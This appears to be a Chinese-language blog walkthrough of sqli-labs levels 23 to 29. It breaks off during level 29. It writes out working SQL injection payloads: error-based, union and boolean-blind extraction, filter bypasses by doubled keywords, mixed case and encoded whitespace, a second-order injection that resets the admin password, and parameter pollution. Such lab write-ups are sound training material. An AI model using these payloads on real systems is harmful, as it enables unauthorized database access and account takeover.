<!DOCTYPE HTML>
<html lang="zh-CN">


<head>
    <meta name="google-site-verification" content="D6LSxgzz99gvhBMd-R2qefCf-eA74itvEMoxOYzUlSo" />
    <meta charset="utf-8">
    <meta name="keywords" content="sqli靶场(23~37关), 网络安全，计算机，渗透">
    <meta name="description" content="第二部分来啦~~


Less-23 注释符绕过输入1’出现如下报错信息:
&#39;&#39;1&#39;&#39; LIMIT 0,1&#39; at line 1

可猜测源码中可能为’$id’
当构造id=1’ and ‘1’=’1 时正常,而id=1’ and ‘1’=">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <meta name="renderer" content="webkit|ie-stand|ie-comp">
    <meta name="mobile-web-app-capable" content="yes">
    <meta name="format-detection" content="telephone=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <meta name="referrer" content="no-referrer-when-downgrade">
    <!-- Global site tag (gtag.js) - Google Analytics -->


    <title>sqli靶场(23~37关) | echozt</title>
    <link rel="icon" type="image/png" href="/favicon.png">

    <link rel="stylesheet" type="text/css" href="/libs/awesome/css/all.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/materialize/materialize.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/aos/aos.css">
    <link rel="stylesheet" type="text/css" href="/libs/animate/animate.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/lightGallery/css/lightgallery.min.css">
    <link rel="stylesheet" type="text/css" href="/css/matery.css">
    <link rel="stylesheet" type="text/css" href="/css/my.css">

    <script src="/libs/jquery/jquery-3.6.0.min.js"></script>

<meta name="generator" content="Hexo 5.4.1"><link rel="alternate" href="/atom.xml" title="echozt" type="application/atom+xml">
<link rel="stylesheet" href="/css/prism-tomorrow.css" type="text/css">
<link rel="stylesheet" href="/css/prism-line-numbers.css" type="text/css"></head>




<body>
    <header class="navbar-fixed">
    <nav id="headNav" class="bg-color nav-transparent">
        <div id="navContainer" class="nav-wrapper container">
            <div class="brand-logo">
                <a href="/" class="waves-effect waves-light">
                    
                    <img src="/medias/logo.png" class="logo-img" alt="LOGO">
                    
                    <span class="logo-span">echozt</span>
                </a>
            </div>
            

<a href="#" data-target="mobile-nav" class="sidenav-trigger button-collapse"><i class="fas fa-bars"></i></a>
<ul class="right nav-menu">
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/" class="waves-effect waves-light">
      
      <i class="fas fa-home" style="zoom: 0.6;"></i>
      
      <span>首页</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/tags" class="waves-effect waves-light">
      
      <i class="fas fa-tags" style="zoom: 0.6;"></i>
      
      <span>标签</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/categories" class="waves-effect waves-light">
      
      <i class="fas fa-bookmark" style="zoom: 0.6;"></i>
      
      <span>分类</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/archives" class="waves-effect waves-light">
      
      <i class="fas fa-archive" style="zoom: 0.6;"></i>
      
      <span>归档</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/about" class="waves-effect waves-light">
      
      <i class="fas fa-user-circle" style="zoom: 0.6;"></i>
      
      <span>关于</span>
    </a>
    
  </li>
  
  <li>
    <a href="#searchModal" class="modal-trigger waves-effect waves-light">
      <i id="searchIcon" class="fas fa-search" title="搜索" style="zoom: 0.85;"></i>
    </a>
  </li>
</ul>


<div id="mobile-nav" class="side-nav sidenav">

    <div class="mobile-head bg-color">
        
        <img src="/medias/logo.png" class="logo-img circle responsive-img">
        
        <div class="logo-name">echozt</div>
        <div class="logo-desc">
            
            分享知识，记录生活
            
        </div>
    </div>

    <ul class="menu-list mobile-menu-list">
        
        <li class="m-nav-item">
	  
		<a href="/" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-home"></i>
			
			首页
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/tags" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-tags"></i>
			
			标签
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/categories" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-bookmark"></i>
			
			分类
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/archives" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-archive"></i>
			
			归档
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/about" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-user-circle"></i>
			
			关于
		</a>
          
        </li>
        
        
    </ul>
</div>


        </div>

        
    </nav>

</header>

    



<div class="bg-cover pd-header post-cover" style="background-image: url('/medias/featureimages/2.jpg')">
    <div class="container" style="right: 0px;left: 0px;">
        <div class="row">
            <div class="col s12 m12 l12">
                <div class="brand">
                    <h1 class="description center-align post-title">sqli靶场(23~37关)</h1>
                </div>
            </div>
        </div>
    </div>
</div>




<main class="post-container content">

    
    <link rel="stylesheet" href="/libs/tocbot/tocbot.css">
<style>
    #articleContent h1::before,
    #articleContent h2::before,
    #articleContent h3::before,
    #articleContent h4::before,
    #articleContent h5::before,
    #articleContent h6::before {
        display: block;
        content: " ";
        height: 100px;
        margin-top: -100px;
        visibility: hidden;
    }

    #articleContent :focus {
        outline: none;
    }

    .toc-fixed {
        position: fixed;
        top: 64px;
    }

    .toc-widget {
        width: 345px;
        padding-left: 20px;
    }

    .toc-widget .toc-title {
        padding: 35px 0 15px 17px;
        font-size: 1.5rem;
        font-weight: bold;
        line-height: 1.5rem;
    }

    .toc-widget ol {
        padding: 0;
        list-style: none;
    }

    #toc-content {
        padding-bottom: 30px;
        overflow: auto;
    }

    #toc-content ol {
        padding-left: 10px;
    }

    #toc-content ol li {
        padding-left: 10px;
    }

    #toc-content .toc-link:hover {
        color: #42b983;
        font-weight: 700;
        text-decoration: underline;
    }

    #toc-content .toc-link::before {
        background-color: transparent;
        max-height: 25px;

        position: absolute;
        right: 23.5vw;
        display: block;
    }

    #toc-content .is-active-link {
        color: #42b983;
    }

    #floating-toc-btn {
        position: fixed;
        right: 15px;
        bottom: 76px;
        padding-top: 15px;
        margin-bottom: 0;
        z-index: 998;
    }

    #floating-toc-btn .btn-floating {
        width: 48px;
        height: 48px;
    }

    #floating-toc-btn .btn-floating i {
        line-height: 48px;
        font-size: 1.4rem;
    }
</style>
<div class="row">
    <div id="main-content" class="col s12 m12 l9">
        <!-- 文章内容详情 -->
<div id="artDetail">
    <div class="card">
        <div class="card-content article-info">
            <div class="row tag-cate">
                <div class="col s7">
                    
                    <div class="article-tag">
                        
                            <a href="/tags/%E9%9D%B6%E5%9C%BA/">
                                <span class="chip bg-color">靶场</span>
                            </a>
                        
                            <a href="/tags/Web%E6%BC%8F%E6%B4%9E/">
                                <span class="chip bg-color">Web漏洞</span>
                            </a>
                        
                            <a href="/tags/sql%E6%B3%A8%E5%85%A5/">
                                <span class="chip bg-color">sql注入</span>
                            </a>
                        
                    </div>
                    
                </div>
                <div class="col s5 right-align">
                    
                    <div class="post-cate">
                        <i class="fas fa-bookmark fa-fw icon-category"></i>
                        
                            <a href="/categories/%E4%B8%93%E9%A1%B9%E9%9D%B6%E5%9C%BA/" class="post-category">
                                专项靶场
                            </a>
                        
                    </div>
                    
                </div>
            </div>
            

            <div class="post-info">
                
                <div class="post-date info-break-policy">
                    <i class="far fa-calendar-minus fa-fw"></i>发布日期:&nbsp;&nbsp;
                    2022-04-10
                </div>
                

                

                
                <div class="info-break-policy">
                    <i class="far fa-file-word fa-fw"></i>文章字数:&nbsp;&nbsp;
                    2.6k
                </div>
                

                

                
                    <div id="busuanzi_container_page_pv" class="info-break-policy">
                        <i class="far fa-eye fa-fw"></i>阅读次数:&nbsp;&nbsp;
                        <span id="busuanzi_value_page_pv"></span>
                    </div>
				
            </div>
        </div>
        <hr class="clearfix">

        

        

        <div class="card-content article-card-content">
            <div id="articleContent">
                <p>第二部分来啦~~</p>
<span id="more"></span>

<h1 id="Less-23-注释符绕过"><a href="#Less-23-注释符绕过" class="headerlink" title="Less-23 注释符绕过"></a>Less-23 注释符绕过</h1><p>输入1’出现如下报错信息:</p>
<pre class="line-numbers language-bash"><code class="language-bash"><span class="token string">''</span>1<span class="token string">''</span> LIMIT 0,1' at line 1
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>可猜测源码中可能为’$id’</p>
<p>当构造id=1’ and ‘1’=’1 时正常,而id=1’ and ‘1’=’1’#或者id=1’ and ‘1’=’1’–+ 时报错，发现是对#和–+等注释符进行了过滤。</p>
<p>注释符绕过只能构造一个单引号来闭合后面的但引号。</p>
<h3 id="利用报错注入："><a href="#利用报错注入：" class="headerlink" title="利用报错注入："></a>利用报错注入：</h3><h3 id="23-1获取数据库用户名"><a href="#23-1获取数据库用户名" class="headerlink" title="23.1获取数据库用户名"></a>23.1获取数据库用户名</h3><pre class="line-numbers language-bash"><code class="language-bash">payload：

id<span class="token operator">=</span>1<span class="token string">' and updatexml(1,concat(0x7e,(select user()),0x7e),1) and '</span>1<span class="token string">'='</span>1
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>
<img src="/posts/fb8a/23.png" class>

<h3 id="23-2获取数据库名"><a href="#23-2获取数据库名" class="headerlink" title="23.2获取数据库名"></a>23.2获取数据库名</h3><pre class="line-numbers language-bash"><code class="language-bash">payload：

id<span class="token operator">=</span>1<span class="token string">' and updatexml(1,concat(0x7e,(select database()),0x7e),1) and '</span>1<span class="token string">'='</span>1
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>
<img src="/posts/fb8a/23_2.png" class>

<p>或者使用：</p>
<pre class="line-numbers language-bash"><code class="language-bash">id<span class="token operator">=</span>1<span class="token string">' and info() and '</span>1<span class="token string">'='</span>1
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<img src="/posts/fb8a/23_3.png" class>

<h3 id="23-3获取表名"><a href="#23-3获取表名" class="headerlink" title="23.3获取表名"></a>23.3获取表名</h3><p>其实我报错函数我比较喜欢用updatexml()，但是呢，当它只能显示32长度的内容，绕过获取的内容超过32字符就要采用字符串截取的方式。然后每次获取32字符串的内容。</p>
<p>比如：</p>
<pre class="line-numbers language-bash"><code class="language-bash">payload:

id<span class="token operator">=</span>1<span class="token string">' and updatexml(1,concat(0x7e,(select substr(group_concat(table_name),1,31) from information_schema.tables where table_schema=database()),0x7e),1) and '</span>1<span class="token string">'='</span>1
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>
<img src="/posts/fb8a/23_4.png" class>

<p>然后接着获取：</p>
<pre class="line-numbers language-bash"><code class="language-bash">id<span class="token operator">=</span>1<span class="token string">' and updatexml(1,concat(0x7e,(select substr(group_concat(table_name),32,62) from information_schema.tables where table_schema=database()),0x7e),1) and '</span>1<span class="token string">'='</span>1
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<img src="/posts/fb8a/23_5.png" class>

<p>啊还有一小节，再来一个：</p>
<pre class="line-numbers language-bash"><code class="language-bash">id<span class="token operator">=</span>1<span class="token string">' and updatexml(1,concat(0x7e,(select substr(group_concat(table_name),63,93) from information_schema.tables where table_schema=database()),0x7e),1) and '</span>1<span class="token string">'='</span>1
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<img src="/posts/fb8a/23_6.png" class>

<p>好了，完工。</p>
<p>其实吧，该说不说，上面这种可能直接手工注入的时候会容易记忆一点，但如果要写成测试脚本的话，就还是使用floor()函数，比较好：</p>
<pre class="line-numbers language-bash"><code class="language-bash">id<span class="token operator">=</span>1<span class="token string">' and (select count(*) from information_schema.tables group by concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e,floor(rand(0)*2))) and '</span>1<span class="token string">'='</span>1
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>好的，亏我以为floor()函数能一次性查出来所有的，原来也只能查到64字节，那剩下的字节就还是用substr()函数查出来吧。</p>
<img src="/posts/fb8a/23_7.png" class>

<h1 id="Less-24-二次注入"><a href="#Less-24-二次注入" class="headerlink" title="Less-24 二次注入"></a>Less-24 二次注入</h1><p>本关为二次注入。</p>
<p>二次注入含义：将可能导致sql 注入的字符先存入到数据库中，当再次调用这个恶意构造的字符时，就可以触发sql注入。</p>
<p>大致原理：先创建一个用户admin’#,再登录这个账号修改密码。原来的密码那里可以任意输，新密码自己设定。修改完成后会发现成功修改了已有账号admin的密码。</p>
<h3 id="24-1先创建一个admin’-的账号"><a href="#24-1先创建一个admin’-的账号" class="headerlink" title="24.1先创建一个admin’#的账号"></a>24.1先创建一个admin’#的账号</h3><img src="/posts/fb8a/24.png" class>

<h3 id="24-2登录admin’-的账号，并修改密码为123456。原来的密码可以随便输，因为会被注释掉。"><a href="#24-2登录admin’-的账号，并修改密码为123456。原来的密码可以随便输，因为会被注释掉。" class="headerlink" title="24.2登录admin’#的账号，并修改密码为123456。原来的密码可以随便输，因为会被注释掉。"></a>24.2登录admin’#的账号，并修改密码为123456。原来的密码可以随便输，因为会被注释掉。</h3><p>在源代码中的sql语句为：</p>
<pre class="line-numbers language-bash"><code class="language-bash"><span class="token variable">$sql</span> <span class="token operator">=</span> <span class="token string">"UPDATE users SET PASSWORD='<span class="token variable">$pass</span>' where username='<span class="token variable">$username</span>' and password='<span class="token variable">$curr_pass</span>' "</span><span class="token punctuation">;</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>即如果我们修改admin’#的密码会变成：</p>
<pre class="line-numbers language-bash"><code class="language-bash"><span class="token variable">$sql</span> <span class="token operator">=</span> "UPDATE <span class="token function">users</span> SET PASSWORD<span class="token operator">=</span><span class="token string">'<span class="token variable">$pass</span>'</span> where username<span class="token operator">=</span><span class="token string">'admin'</span><span class="token comment" spellcheck="true">#' and password='$curr_pass' ";</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>所以我们就可以变成修改admin的密码了。</p>
<img src="/posts/fb8a/24_2.png" class>

<h3 id="24-3可以看到数据库中，admin的密码由原来的admin被改成了我们所修改的123456"><a href="#24-3可以看到数据库中，admin的密码由原来的admin被改成了我们所修改的123456" class="headerlink" title="24.3可以看到数据库中，admin的密码由原来的admin被改成了我们所修改的123456"></a>24.3可以看到数据库中，admin的密码由原来的admin被改成了我们所修改的123456</h3><img src="/posts/fb8a/23_3.png" class>

<h1 id="and和or绕过-Less-25-Less25a"><a href="#and和or绕过-Less-25-Less25a" class="headerlink" title="and和or绕过(Less-25~Less25a)"></a>and和or绕过(Less-25~Less25a)</h1><h2 id="Less-25"><a href="#Less-25" class="headerlink" title="Less-25"></a>Less-25</h2><p>本关对or和and进行了过滤。要绕过or和and，构造其他的注入语句。</p>
<h4 id="方法一："><a href="#方法一：" class="headerlink" title="方法一："></a>方法一：</h4><p>尝试双写绕过。即双写关键字，可将and写为anandd，or写成oorr,发现成功绕过了耶。</p>
<h4 id="方法二："><a href="#方法二：" class="headerlink" title="方法二："></a>方法二：</h4><p>可尝试将and替换成&amp;&amp;，or替换成||。这里我试了一下用||可以，但&amp;&amp;不可以，因为&amp;在数据包里面相当于里面的参数连接符，可以将&amp;&amp;进行url编码成%26%26使用。</p>
<h3 id="这里采用双写绕过并利用报错注入："><a href="#这里采用双写绕过并利用报错注入：" class="headerlink" title="这里采用双写绕过并利用报错注入："></a>这里采用双写绕过并利用报错注入：</h3><h4 id="①获取数据库用户名"><a href="#①获取数据库用户名" class="headerlink" title="①获取数据库用户名"></a>①获取数据库用户名</h4><pre class="line-numbers language-bash"><code class="language-bash">payload：

id<span class="token operator">=</span>1' anandd updatexml<span class="token punctuation">(</span>1,concat<span class="token punctuation">(</span>0x7e,<span class="token punctuation">(</span>select user<span class="token punctuation">(</span><span class="token punctuation">))</span>,0x7e<span class="token punctuation">)</span>,1<span class="token punctuation">)</span>--+
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>
<img src="/posts/fb8a/25.png" class>

<h4 id="②获取数据库名"><a href="#②获取数据库名" class="headerlink" title="②获取数据库名"></a>②获取数据库名</h4><pre class="line-numbers language-bash"><code class="language-bash">payload:

id<span class="token operator">=</span>1' anandd info<span class="token punctuation">(</span><span class="token punctuation">)</span>--+
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>
<img src="/posts/fb8a/25_2.png" class>

<p>或者使用：</p>
<pre class="line-numbers language-bash"><code class="language-bash">id<span class="token operator">=</span>1' anandd updatexml<span class="token punctuation">(</span>1,concat<span class="token punctuation">(</span>0x7e,<span class="token punctuation">(</span>select database<span class="token punctuation">(</span><span class="token punctuation">))</span>,0x7e<span class="token punctuation">)</span>,1<span class="token punctuation">)</span>--+
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<img src="/posts/fb8a/25_3.png" class>

<h2 id="Less-25a"><a href="#Less-25a" class="headerlink" title="Less-25a"></a>Less-25a</h2><p>本关错误时不会显示错在哪里了，所以不能采用报错注入。并且也对and和or进行了过滤。</p>
<p>当使用id=1 || 1=1出现正确信息，说明在源码中id=$id。</p>
<p>可以使用延时注入和布尔盲注。</p>
<h3 id="这里还是用anandd双写来代替and-下面采用基于布尔的盲注："><a href="#这里还是用anandd双写来代替and-下面采用基于布尔的盲注：" class="headerlink" title="这里还是用anandd双写来代替and,下面采用基于布尔的盲注："></a>这里还是用anandd双写来代替and,下面采用基于布尔的盲注：</h3><h4 id="①获取数据库用户名-1"><a href="#①获取数据库用户名-1" class="headerlink" title="①获取数据库用户名"></a>①获取数据库用户名</h4><pre class="line-numbers language-bash"><code class="language-bash">payload:

id<span class="token operator">=</span>1 anandd substr<span class="token punctuation">(</span>user<span class="token punctuation">(</span><span class="token punctuation">)</span>,1,1<span class="token punctuation">)</span><span class="token operator">=</span><span class="token string">'a'</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>
<p>当字母正确时，会出现正确的页面，当字母不正确时，会出现不正确的页面。也可以用burp抓包，对substr的第一个1和字母a进行爆破。</p>
<h4 id="②获取数据库名-1"><a href="#②获取数据库名-1" class="headerlink" title="②获取数据库名"></a>②获取数据库名</h4><pre class="line-numbers language-bash"><code class="language-bash">payload：

id<span class="token operator">=</span>1 anandd substr<span class="token punctuation">(</span>database<span class="token punctuation">(</span><span class="token punctuation">)</span>,1,1<span class="token punctuation">)</span><span class="token operator">=</span><span class="token string">'a'</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>
<p>当字母正确时，会出现正确的页面，当字母不正确时，会出现不正确的页面。也可以用burp抓包，对substr的第一个1和字母a进行爆破。</p>
<img src="/posts/fb8a/25a.png" class>

<h1 id="空格字符绕过-Less-26-Less26a"><a href="#空格字符绕过-Less-26-Less26a" class="headerlink" title="空格字符绕过(Less-26~Less26a)"></a>空格字符绕过(Less-26~Less26a)</h1><h2 id="Less-26"><a href="#Less-26" class="headerlink" title="Less-26"></a>Less-26</h2><p>本关将or,and,空格,/*,#,–,/等各种字符就进行了过滤。</p>
<p>空格字符绕过：</p>
<pre class="line-numbers language-bash"><code class="language-bash">%20 %09 %0a %0b %0c %0d %a0 /**/ +
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<h3 id="本关可以用报错注入："><a href="#本关可以用报错注入：" class="headerlink" title="本关可以用报错注入："></a>本关可以用报错注入：</h3><h4 id="①获得数据库用户名"><a href="#①获得数据库用户名" class="headerlink" title="①获得数据库用户名"></a>①获得数据库用户名</h4><pre class="line-numbers language-bash"><code class="language-bash">payload:

id<span class="token operator">=</span>1<span class="token string">'+||+updatexml(1,concat(0x7e,user(),0x7e),1)+||+'</span>1
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>
<img src="/posts/fb8a/26.png" class>

<h4 id="②获得数据库名"><a href="#②获得数据库名" class="headerlink" title="②获得数据库名"></a>②获得数据库名</h4><pre class="line-numbers language-bash"><code class="language-bash">payload：

id<span class="token operator">=</span>1<span class="token string">'+||+info()+||+'</span>1

或者

id<span class="token operator">=</span>1<span class="token string">'+||+updatexml(1,concat(0x7e,database(),0x7e),1)+||+'</span>1
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<img src="/posts/fb8a/26_2.png" class>

<h2 id="Less-26a"><a href="#Less-26a" class="headerlink" title="Less-26a"></a>Less-26a</h2><p>本关过滤的字符跟第二十六关一样，闭合方式是’) 并且不能用报错注入了，因为不会显示错在哪里了。可以采用union联合注入或盲注。</p>
<h3 id="下面采用union联合注入："><a href="#下面采用union联合注入：" class="headerlink" title="下面采用union联合注入："></a>下面采用union联合注入：</h3><h4 id="①获得数据库名"><a href="#①获得数据库名" class="headerlink" title="①获得数据库名"></a>①获得数据库名</h4><pre class="line-numbers language-bash"><code class="language-bash">payload：

id<span class="token operator">=</span>999<span class="token string">')+union%0bselect%0b1,database(),3+||('</span>1
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>
<p>这里的999为一个不存在的值，%0b可以用%a0代替，其他不行，可能是系统问题。</p>
<img src="/posts/fb8a/26a.png" class>

<h4 id="②获得用户名"><a href="#②获得用户名" class="headerlink" title="②获得用户名"></a>②获得用户名</h4><pre class="line-numbers language-bash"><code class="language-bash">payload：

id<span class="token operator">=</span>999<span class="token string">')+union%0bselect%0b1,user(),3+||('</span>1
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>
<img src="/posts/fb8a/26a_2.png" class>

<h4 id="③获得表名"><a href="#③获得表名" class="headerlink" title="③获得表名"></a>③获得表名</h4><pre class="line-numbers language-bash"><code class="language-bash">payload：

id<span class="token operator">=</span>id<span class="token operator">=</span>999<span class="token string">')+union%0bselect%0b1,group_concat(table_name),3%0bfrom%0binfoorrmation_schema.tables%0bwhere%0btable_schema=database()||('</span>1
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>
<img src="/posts/fb8a/26a_3.png" class>

<h1 id="union和select绕过-Less-27-Less-28a"><a href="#union和select绕过-Less-27-Less-28a" class="headerlink" title="union和select绕过(Less-27~Less-28a)"></a>union和select绕过(Less-27~Less-28a)</h1><h2 id="Less-27"><a href="#Less-27" class="headerlink" title="Less-27"></a>Less-27</h2><p>本关主要是union、select字符和26关过滤掉的字符。</p>
<p>如果要用到union和select的话，可以使用大小写混写或者双写关键字绕过。</p>
<h3 id="可以采用报错注入："><a href="#可以采用报错注入：" class="headerlink" title="可以采用报错注入："></a>可以采用报错注入：</h3><h4 id="①获得数据库用户名-1"><a href="#①获得数据库用户名-1" class="headerlink" title="①获得数据库用户名"></a>①获得数据库用户名</h4><pre class="line-numbers language-bash"><code class="language-bash">payload：

id<span class="token operator">=</span>1<span class="token string">'+and%a0updatexml(1,concat(0x7e,user(),0x7e),1)+and+'</span>1
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>
<img src="/posts/fb8a/27.png" class>

<h4 id="②获得数据库名："><a href="#②获得数据库名：" class="headerlink" title="②获得数据库名："></a>②获得数据库名：</h4><pre class="line-numbers language-bash"><code class="language-bash">payload：

1<span class="token string">'+and%a0info()+and+'</span>1

或者

id<span class="token operator">=</span>1<span class="token string">'+and%a0updatexml(1,concat(0x7e,database(),0x7e),1)+and+'</span>1
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<img src="/posts/fb8a/27_2.png" class>

<h2 id="Less-27a"><a href="#Less-27a" class="headerlink" title="Less-27a"></a>Less-27a</h2><p>本关过滤的字符跟第二十七关一样，闭合方式为”并且不能采用报错注入了。</p>
<h3 id="可以采用union联合注入（union和select大小写混写）："><a href="#可以采用union联合注入（union和select大小写混写）：" class="headerlink" title="可以采用union联合注入（union和select大小写混写）："></a>可以采用union联合注入（union和select大小写混写）：</h3><h4 id="①获得数据库用户名-2"><a href="#①获得数据库用户名-2" class="headerlink" title="①获得数据库用户名"></a>①获得数据库用户名</h4><pre class="line-numbers language-bash"><code class="language-bash">payload：

id<span class="token operator">=</span>999<span class="token string">"+UniOn%a0SeLect%a01,user(),3+||+"</span>1
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>
<img src="/posts/fb8a/27a.png" class>

<h4 id="②获得数据库名-1"><a href="#②获得数据库名-1" class="headerlink" title="②获得数据库名"></a>②获得数据库名</h4><pre class="line-numbers language-bash"><code class="language-bash">payload：

id<span class="token operator">=</span>999<span class="token string">"+UniOn%a0SeLect%a01,database(),3+||+"</span>1
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>
<img src="/posts/fb8a/27a_2.png" class>

<h2 id="Less-28"><a href="#Less-28" class="headerlink" title="Less-28"></a>Less-28</h2><p>本关第二十七差不多,只是闭合的方式是’)</p>
<h4 id="①获取数据库名："><a href="#①获取数据库名：" class="headerlink" title="①获取数据库名："></a>①获取数据库名：</h4><pre class="line-numbers language-bash"><code class="language-bash">payload：

id<span class="token operator">=</span>999<span class="token string">') union%a0select%a01,database(),3+||+('</span>1
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>
<img src="/posts/fb8a/28.png" class>

<h4 id="②获得数据库用户名"><a href="#②获得数据库用户名" class="headerlink" title="②获得数据库用户名"></a>②获得数据库用户名</h4><pre class="line-numbers language-bash"><code class="language-bash">payload：

id<span class="token operator">=</span>999<span class="token string">') union%a0select%a01,user(),3+||+('</span>1
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>
<img src="/posts/fb8a/28_2.png" class>

<h2 id="Less-28a"><a href="#Less-28a" class="headerlink" title="Less-28a"></a>Less-28a</h2><p>用第二十八关的payload一样可以</p>
<h1 id="HPP-HTTP-Parameter-Pollution-，http-参数污染-Less29-Less-31"><a href="#HPP-HTTP-Parameter-Pollution-，http-参数污染-Less29-Less-31" class="headerlink" title="HPP(HTTP Parameter Pollution)，http 参数污染(Less29~Less-31)"></a>HPP(HTTP Parameter Pollution)，http 参数污染(Less29~Less-31)</h1><p>这三关是要搭建环境才能实现的。好像要在Ubuntu下，并且要下载tomcat，jdk等等。想了想，了解下原理，还是在PHP环境下绕过得了。</p>
<p>这里的两层架构的工作流程为：</p>
<p>client 访问服务器，能直接访问到 tomcat 服务器，然后 tomcat 服务器再向 apache 服务器请求数据。数据返回路径则相反。</p>
<p>这里需要注意的就是：</p>
<p>index.php?id=1&amp;id=2,在Apache(php)解析最后一个参数，Tomcat(jsp)解析第一个参数。那先经过Tomcat再到Apache的也是显示最后一个参数。</p>
<h2 id="Less-29"><a href="#Less-29" class="headerlink" title="Less-29"></a>Less-29</h2><p>这里使用一个单引号报错，使用两个单引号正常。</p>
<h3 id="（1）直接用报错注入"><a href="#（1）直接用报错注入" class="headerlink" title="（1）直接用报错注入"></a>（1）直接用报错注入</h3><h4 id="①得到数据库用户名"><a href="#①得到数据库用户名" class="headerlink" title="①得到数据库用户名"></a>①得到数据库用户名</h4><pre class="line-numbers language-bash"><code class="language-bash">payload:

id<span class="token operator">=</span>1' and updatexml<span class="token punctuation">(</span>1,concat<span class="token punctuation">(</span>0x7e,user<span class="token punctuation">(</span><span class="token punctuation">)</span>,0x7e<span class="token punctuation">)</span>,1<span class="token punctuation">)</span>--+
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>
<img src="/posts/fb8a/29.png" class>

<h4 id="②获取数据库名-2"><a href="#②获取数据库名-2" class="headerlink" title="②获取数据库名"></a>②获取数据库名</h4><pre class="line-numbers language-bash"><code class="language-bash">payload：

id<span class="token operator">=</span>1' and updatexml<span class="token punctuation">(</span>1,concat<span class="token punctuation">(</span>0x7e,database<span class="token punctuation">(</span><span class="token punctuation">)</span>,0x7e<span class="token punctuation">)</span>,1<span class="token punctuation">)</span>--+
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>
<img src="/posts/fb8a/29_2.png" class> 

<h3 id="（2）使用联合注入"><a href="#（2）使用联合注入" class="headerlink" title="（2）使用联合注入"></a>（2）使用联合注入</h3><p>其实吧，我一般不怎么用union，因为还要先判断字段和注入点。好久没用了，还是用一下吧。</p>
<h4 id="①先判断有几个字段"><a href="#①先判断有几个字段" class="headerlink" title="①先判断有几个字段"></a>①先判断有几个字段</h4><p>当输到id=1’ order by 4–+时报错，说明有三个字段</p>
<h4 id="②找注入点"><a href="#②找注入点" class="headerlink" title="②找注入点"></a>②找注入点</h4><p>id=-1’ union select  1,2,3–+</p>
<p>可以看到在2,3的位置都可以写注入语句。</p>
<img src="/posts/fb8a/29_3.png" class>

<h4 id="③构造union语句"><a href="#③构造union语句" class="headerlink" title="③构造union语句"></a>③构造union语句</h4><h3 id="29-1获得数据库用户名"><a href="#29-1获得数据库用户名" class="headerlink" title="29.1获得数据库用户名"></a>29.1获得数据库用户名</h3><pre class="line-numbers language-bash"><code class="language-bash">payload：

id<span class="token operator">=</span>-1' union <span class="token keyword">select</span>  1,2,user<span class="token punctuation">(</span><span class="token punctuation">)</span>--+
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>
<img src="/posts/fb8a/29_4.png" class>

<h3 id="29-2获得数据库名"><a href="#29-2获得数据库名" class="headerlink" title="29.2获得数据库名"></a>29.2获得数据库名</h3><pre class="line-numbers language-bash"><code class="language-bash">payload：

